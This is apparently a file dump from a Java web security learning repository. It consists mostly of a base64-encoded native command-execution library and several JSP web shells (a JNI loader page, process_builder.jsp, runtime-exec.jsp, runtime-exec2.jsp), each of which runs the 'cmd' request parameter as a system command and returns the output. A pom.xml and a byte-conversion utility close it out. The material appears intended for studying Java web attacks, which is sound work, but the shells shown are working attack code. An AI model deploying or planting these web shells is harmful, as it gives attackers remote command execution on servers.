AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAwDwAAAAAAAFALAAAAAAAAsAoAAAAAAAAIDwAAAAAAABIPAAAAAAAAHA8AAAAAAAAmDwAAAAAAADoPAAAAAAAARA8AAAAAAABODwAAAAAAAFgPAAAAAAAAYg8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAESIAXAAAAAARQF9fX2d4eF9wZXJzb25hbGl0eV92MABRcQCQEkBfX19zdGFja19jaGtfZ3VhcmQAkEBkeWxkX3N0dWJfYmluZGVyAJAAAABAX19aTjdKTklFbnZfMTJOZXdTdHJpbmdVVEZFUEtjAFFyCJBAX19aTjdKTklFbnZfMTdHZXRTdHJpbmdVVEZDaGFyc0VQOF9qc3RyaW5nUGgAkAAAAAAAcgASQF9fVW53aW5kX1Jlc3VtZQCQAHIYEUBfX1pOU3QzX18xMTJiYXNpY19zdHJpbmdJY05TXzExY2hhcl90cmFpdHNJY0VFTlNfOWFsbG9jYXRvckljRUVFNmFwcGVuZEVQS2MAkAByIBFAX19aTlN0M19fMTEyYmFzaWNfc3RyaW5nSWNOU18xMWNoYXJfdHJhaXRzSWNFRU5TXzlhbGxvY2F0b3JJY0VFRUQxRXYAkAByKBFAX19aU3Q5dGVybWluYXRldgCQAHIwEUBfX19jeGFfYmVnaW5fY2F0Y2gAkAByOBJAX19fc3RhY2tfY2hrX2ZhaWwAkAByQBJAX2ZnZXRzAJAAckgSQF9tZW1zZXQAkAByUBJAX3BjbG9zZQCQAHJYEkBfcG9wZW4AkAAAAAAAAAAAAAFfAAUAAkphdmFfY29tX2FuYmFpX3NlY19jbWRfQ29tbWFuZEV4ZWN1dGlvbl9leGVjAENfWk43Sk5JRW52XzEASAMAwBEAAAI3R2V0U3RyaW5nVVRGQ2hhcnNFUDhfanN0cmluZ1BoAH8yTmV3U3RyaW5nVVRGRVBLYwCEAQMEsBUAAwTQFgAAAAAAAAAAwBHwA1AgMEAgEDAgUEAwIBAgEDAQUEAgMCAQIAAAAACrAQAADgEAAAALAAAAAAAA8AEAAA4BAAAgCwAAAAAAADcCAAAOAQAAkAsAAAAAAACBAgAAHgGAALALAAAAAAAAmQIAAA4BAADACwAAAAAAAN4CAAAOAQAA8AsAAAAAAABFAwAADgEAABAMAAAAAAAAjwMAAA4BAABgDAAAAAAAAPYDAAAOAQAAoAwAAAAAAABnBAAADgEAANAMAAAAAAAAqQQAAA4BAADwDAAAAAAAAMUEAAAOAQAAAA0AAAAAAAAwBQAADgEAACANAAAAAAAApQUAAA4BAAAwDQAAAAAAAO4FAAAOAQAAYA0AAAAAAAAXBgAADgEAAHANAAAAAAAAagYAAA4BAADADQAAAAAAALgGAAAOAQAAAA4AAAAAAAAQBwAADgEAACAOAAAAAAAAaQcAAA4BAABQDgAAAAAAANUHAAAOAQAAcA4AAAAAAABLCAAADgEAAIAOAAAAAAAAfAgAAA4BAACgDgAAAAAAAJ4IAAAOBAAAbA8AAAAAAACwCAAADgkAAGAgAAAAAAAAAgAAAA8BAADACAAAAAAAADAAAAAPAYAAUAsAAAAAAABPAAAADwGAALAKAAAAAAAAfAAAAAEAAAIAAAAAAAAAAIwAAAABAAABAAAAAAAAAADYAAAAAQAAAQAAAAAAAAAAHQEAAAEAAAEAAAAAAAAAAC4BAAABAAABAAAAAAAAAABBAQAAAQAAAQAAAAAAAAAAVwEAAAEAAAIAAAAAAAAAAGkBAAABAAACAAAAAAAAAAB8AQAAAQAAAgAAAAAAAAAAgwEAAAEAAAIAAAAAAAAAAIsBAAABAAACAAAAAAAAAACTAQAAAQAAAgAAAAAAAAAAmgEAAAEAAAIAAAAAAAAAABwAAAAaAAAAGwAAAB0AAAAeAAAAHwAAACAAAAAiAAAAJAAAACUAAAAmAAAAJwAAACEAAAAjAAAAKAAAABwAAAAaAAAAGwAAAB0AAAAeAAAAHwAAACAAAAAiAAAAJAAAACUAAAAmAAAAJwAAACAAX0phdmFfY29tX2FuYmFpX3NlY19jbWRfQ29tbWFuZEV4ZWN1dGlvbl9leGVjAF9fWk43Sk5JRW52XzEyTmV3U3RyaW5nVVRGRVBLYwBfX1pON0pOSUVudl8xN0dldFN0cmluZ1VURkNoYXJzRVA4X2pzdHJpbmdQaABfX1Vud2luZF9SZXN1bWUAX19aTlN0M19fMTEyYmFzaWNfc3RyaW5nSWNOU18xMWNoYXJfdHJhaXRzSWNFRU5TXzlhbGxvY2F0b3JJY0VFRTZhcHBlbmRFUEtjAF9fWk5TdDNfXzExMmJhc2ljX3N0cmluZ0ljTlNfMTFjaGFyX3RyYWl0c0ljRUVOU185YWxsb2NhdG9ySWNFRUVEMUV2AF9fWlN0OXRlcm1pbmF0ZXYAX19fY3hhX2JlZ2luX2NhdGNoAF9fX2d4eF9wZXJzb25hbGl0eV92MABfX19zdGFja19jaGtfZmFpbABfX19zdGFja19jaGtfZ3VhcmQAX2ZnZXRzAF9tZW1zZXQAX3BjbG9zZQBfcG9wZW4AZHlsZF9zdHViX2JpbmRlcgBfX1pOU3QzX18xMTJiYXNpY19zdHJpbmdJY05TXzExY2hhcl90cmFpdHNJY0VFTlNfOWFsbG9jYXRvckljRUVFQzFFdgBfX1pOU3QzX18xMTJiYXNpY19zdHJpbmdJY05TXzExY2hhcl90cmFpdHNJY0VFTlNfOWFsbG9jYXRvckljRUVFcExFUEtjAF9fWk5LU3QzX18xMTJiYXNpY19zdHJpbmdJY05TXzExY2hhcl90cmFpdHNJY0VFTlNfOWFsbG9jYXRvckljRUVFNWNfc3RyRXYAX19fY2xhbmdfY2FsbF90ZXJtaW5hdGUAX19aTlN0M19fMTEyYmFzaWNfc3RyaW5nSWNOU18xMWNoYXJfdHJhaXRzSWNFRU5TXzlhbGxvY2F0b3JJY0VFRUMyRXYAX19aTlN0M19fMTE3X19jb21wcmVzc2VkX3BhaXJJTlNfMTJiYXNpY19zdHJpbmdJY05TXzExY2hhcl90cmFpdHNJY0VFTlNfOWFsbG9jYXRvckljRUVFNV9fcmVwRVM1X0VDMUV2AF9fWk5TdDNfXzExMmJhc2ljX3N0cmluZ0ljTlNfMTFjaGFyX3RyYWl0c0ljRUVOU185YWxsb2NhdG9ySWNFRUU2X196ZXJvRXYAX19aTlN0M19fMTE3X19jb21wcmVzc2VkX3BhaXJJTlNfMTJiYXNpY19zdHJpbmdJY05TXzExY2hhcl90cmFpdHNJY0VFTlNfOWFsbG9jYXRvckljRUVFNV9fcmVwRVM1X0VDMkV2AF9fWk5TdDNfXzEyMl9fY29tcHJlc3NlZF9wYWlyX2VsZW1JTlNfMTJiYXNpY19zdHJpbmdJY05TXzExY2hhcl90cmFpdHNJY0VFTlNfOWFsbG9jYXRvckljRUVFNV9fcmVwRUxpMEVMYjBFRUMyRXYAX19aTlN0M19fMTIyX19jb21wcmVzc2VkX3BhaXJfZWxlbUlOU185YWxsb2NhdG9ySWNFRUxpMUVMYjFFRUMyRXYAX19aTlN0M19fMTlhbGxvY2F0b3JJY0VDMkV2AF9fWk5TdDNfXzExN19fY29tcHJlc3NlZF9wYWlySU5TXzEyYmFzaWNfc3RyaW5nSWNOU18xMWNoYXJfdHJhaXRzSWNFRU5TXzlhbGxvY2F0b3JJY0VFRTVfX3JlcEVTNV9FNWZpcnN0RXYAX19aTlN0M19fMTIyX19jb21wcmVzc2VkX3BhaXJfZWxlbUlOU18xMmJhc2ljX3N0cmluZ0ljTlNfMTFjaGFyX3RyYWl0c0ljRUVOU185YWxsb2NhdG9ySWNFRUU1X19yZXBFTGkwRUxiMEVFNV9fZ2V0RXYAX19aTktTdDNfXzExMmJhc2ljX3N0cmluZ0ljTlNfMTFjaGFyX3RyYWl0c0ljRUVOU185YWxsb2NhdG9ySWNFRUU0ZGF0YUV2AF9fWk5TdDNfXzFMMTZfX3RvX3Jhd19wb2ludGVySUtjRUVQVF9TM18AX19aTktTdDNfXzExMmJhc2ljX3N0cmluZ0ljTlNfMTFjaGFyX3RyYWl0c0ljRUVOU185YWxsb2NhdG9ySWNFRUUxM19fZ2V0X3BvaW50ZXJFdgBfX1pOS1N0M19fMTEyYmFzaWNfc3RyaW5nSWNOU18xMWNoYXJfdHJhaXRzSWNFRU5TXzlhbGxvY2F0b3JJY0VFRTlfX2lzX2xvbmdFdgBfX1pOS1N0M19fMTEyYmFzaWNfc3RyaW5nSWNOU18xMWNoYXJfdHJhaXRzSWNFRU5TXzlhbGxvY2F0b3JJY0VFRTE4X19nZXRfbG9uZ19wb2ludGVyRXYAX19aTktTdDNfXzExMmJhc2ljX3N0cmluZ0ljTlNfMTFjaGFyX3RyYWl0c0ljRUVOU185YWxsb2NhdG9ySWNFRUUxOV9fZ2V0X3Nob3J0X3BvaW50ZXJFdgBfX1pOS1N0M19fMTE3X19jb21wcmVzc2VkX3BhaXJJTlNfMTJiYXNpY19zdHJpbmdJY05TXzExY2hhcl90cmFpdHNJY0VFTlNfOWFsbG9jYXRvckljRUVFNV9fcmVwRVM1X0U1Zmlyc3RFdgBfX1pOS1N0M19fMTIyX19jb21wcmVzc2VkX3BhaXJfZWxlbUlOU18xMmJhc2ljX3N0cmluZ0ljTlNfMTFjaGFyX3RyYWl0c0ljRUVOU185YWxsb2NhdG9ySWNFRUU1X19yZXBFTGkwRUxiMEVFNV9fZ2V0RXYAX19aTlN0M19fMTE0cG9pbnRlcl90cmFpdHNJUEtjRTEwcG9pbnRlcl90b0VSUzFfAF9fWk5TdDNfXzFMOWFkZHJlc3NvZklLY0VFUFRfUlMyXwBHQ0NfZXhjZXB0X3RhYmxlMABfX2R5bGRfcHJpdmF0ZQAA";
40 |
41 | /**
42 | * 获取JNI链接库目录
43 | * @return 返回缓存JNI的临时目录
44 | */
45 | File getTempJNILibFile() {
46 | File jniDir = new File(System.getProperty("java.io.tmpdir"), "jni-lib");
47 |
48 | if (!jniDir.exists()) {
49 | jniDir.mkdir();
50 | }
51 |
52 | return new File(jniDir, "libcmd.lib");
53 | }
54 |
55 | /**
56 | * 写JNI链接库文件
57 | * @param base64 JNI动态库Base64
58 | * @return 返回是否写入成功
59 | */
60 | void writeJNILibFile(String base64) throws IOException {
61 | if (base64 != null) {
62 |
63 | File jniFile = getTempJNILibFile();
64 |
65 | if (!jniFile.exists()) {
66 | byte[] bytes = new BASE64Decoder().decodeBuffer(base64);
67 |
68 | if (bytes != null) {
69 | FileOutputStream fos = new FileOutputStream(jniFile);
70 | fos.write(bytes);
71 | fos.flush();
72 | fos.close();
73 | }
74 | }
75 | }
76 | }
77 | %>
78 | <%
79 | // 需要执行的命令
80 | String cmd = request.getParameter("cmd");
81 |
82 | // JNI链接库字节码,如果不传会使用"COMMAND_JNI_FILE_BYTES"值
83 | String jniBytes = request.getParameter("jni");
84 |
85 | // JNI路径
86 | File jniFile = getTempJNILibFile();
87 | ClassLoader loader = (ClassLoader) application.getAttribute("__LOADER__");
88 |
89 | if (loader == null) {
90 | loader = new ClassLoader(this.getClass().getClassLoader()) {
91 | @Override
92 | protected Class findClass(String name) throws ClassNotFoundException {
93 | try {
94 | return super.findClass(name);
95 | } catch (ClassNotFoundException e) {
96 | return defineClass(COMMAND_CLASS_NAME, COMMAND_CLASS_BYTES, 0, COMMAND_CLASS_BYTES.length);
97 | }
98 | }
99 | };
100 |
101 | writeJNILibFile(jniBytes != null ? jniBytes : COMMAND_JNI_FILE_BYTES);// 写JNI文件到临时文件目录
102 |
103 | application.setAttribute("__LOADER__", loader);
104 | }
105 |
106 | try {
107 | // load命令执行类
108 | Class commandClass = loader.loadClass("com.anbai.sec.cmd.CommandExecution");
109 | Object loadLib = application.getAttribute("__LOAD_LIB__");
110 |
111 | if (loadLib == null || !((Boolean) loadLib)) {
112 | Method loadLibrary0Method = ClassLoader.class.getDeclaredMethod("loadLibrary0", Class.class, File.class);
113 | loadLibrary0Method.setAccessible(true);
114 | loadLibrary0Method.invoke(loader, commandClass, jniFile);
115 | application.setAttribute("__LOAD_LIB__", true);
116 | }
117 |
118 | String content = (String) commandClass.getMethod("exec", String.class).invoke(null, cmd);
119 | out.println("");
120 | out.println(content);
121 | out.println("");
122 | } catch (Exception e) {
123 | out.println(e.toString());
124 | throw e;
125 | }
126 |
127 | %>
--------------------------------------------------------------------------------
/javaweb-sec-source/javase/src/main/webapp/process_builder.jsp:
--------------------------------------------------------------------------------
1 | <%--
2 | Created by IntelliJ IDEA.
3 | User: yz
4 | Date: 2019/12/6
5 | Time: 10:26 上午
6 | To change this template use File | Settings | File Templates.
7 | --%>
8 | <%@ page contentType="text/html;charset=UTF-8" language="java" %>
9 | <%@ page import="java.io.ByteArrayOutputStream" %>
10 | <%@ page import="java.io.InputStream" %>
11 | <%
12 | InputStream in = new ProcessBuilder(request.getParameterValues("cmd")).start().getInputStream();
13 | ByteArrayOutputStream baos = new ByteArrayOutputStream();
14 | byte[] b = new byte[1024];
15 | int a = -1;
16 |
17 | while ((a = in.read(b)) != -1) {
18 | baos.write(b, 0, a);
19 | }
20 |
21 | out.write("" + new String(baos.toByteArray()) + "
");
22 | %>
--------------------------------------------------------------------------------
/javaweb-sec-source/javase/src/main/webapp/runtime-exec.jsp:
--------------------------------------------------------------------------------
1 | <%=Runtime.getRuntime().exec(request.getParameter("cmd"))%>
--------------------------------------------------------------------------------
/javaweb-sec-source/javase/src/main/webapp/runtime-exec2.jsp:
--------------------------------------------------------------------------------
1 | <%--
2 | Created by IntelliJ IDEA.
3 | User: yz
4 | Date: 2019/12/5
5 | Time: 6:21 下午
6 | To change this template use File | Settings | File Templates.
7 | --%>
8 | <%@ page contentType="text/html;charset=UTF-8" language="java" %>
9 | <%@ page import="java.io.ByteArrayOutputStream" %>
10 | <%@ page import="java.io.InputStream" %>
11 | <%
12 | InputStream in = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream();
13 |
14 | ByteArrayOutputStream baos = new ByteArrayOutputStream();
15 | byte[] b = new byte[1024];
16 | int a = -1;
17 |
18 | while ((a = in.read(b)) != -1) {
19 | baos.write(b, 0, a);
20 | }
21 |
22 | out.write("" + new String(baos.toByteArray()) + "
");
23 | %>
--------------------------------------------------------------------------------
/javaweb-sec-source/javaweb-sec-utils/pom.xml:
--------------------------------------------------------------------------------
1 |
2 |
5 |
6 |
7 | javaweb-sec-source
8 | com.anbai
9 | 1.0.0
10 |
11 |
12 | 4.0.0
13 | javaweb-sec-utils
14 |
15 |
16 |
17 |
18 | org.apache.maven.plugins
19 | maven-compiler-plugin
20 |
21 | 7
22 | 7
23 |
24 |
25 |
26 |
27 |
28 |
29 |
30 |
31 | commons-io
32 | commons-io
33 | 2.6
34 |
35 |
36 |
37 |
38 |
--------------------------------------------------------------------------------
/javaweb-sec-source/javaweb-sec-utils/src/main/java/Bytes.java:
--------------------------------------------------------------------------------
1 | import java.io.File;
2 | import java.io.IOException;
3 | import java.nio.file.Files;
4 | import java.util.Arrays;
5 |
6 | /**
7 | * 字符串、文件快速转换成byte数组
8 | * Creator: yz
9 | * Date: 2019/12/8
10 | */
11 | public class Bytes {
12 |
13 | public static void main(String[] args) throws IOException {
14 |
15 | if (args.length > 0) {
16 | String str = args[0];
17 | byte[] bytes = null;
18 |
19 | if (args.length == 2 && str.equals("-f")) {
20 | File file = new File(args[1]);
21 | bytes = Files.readAllBytes(file.toPath());
22 | } else {
23 | bytes = str.getBytes();
24 | }
25 |
26 | System.out.println(Arrays.toString(bytes));
27 | } else {
28 | System.out.println("Examples:");
29 | System.out.println("java Bytes [string]");
30 | System.out.println("java Bytes -f [path]");
31 | }
32 | }
33 |
34 | }
35 |
--------------------------------------------------------------------------------
/javaweb-sec-source/pom.xml:
--------------------------------------------------------------------------------
1 |
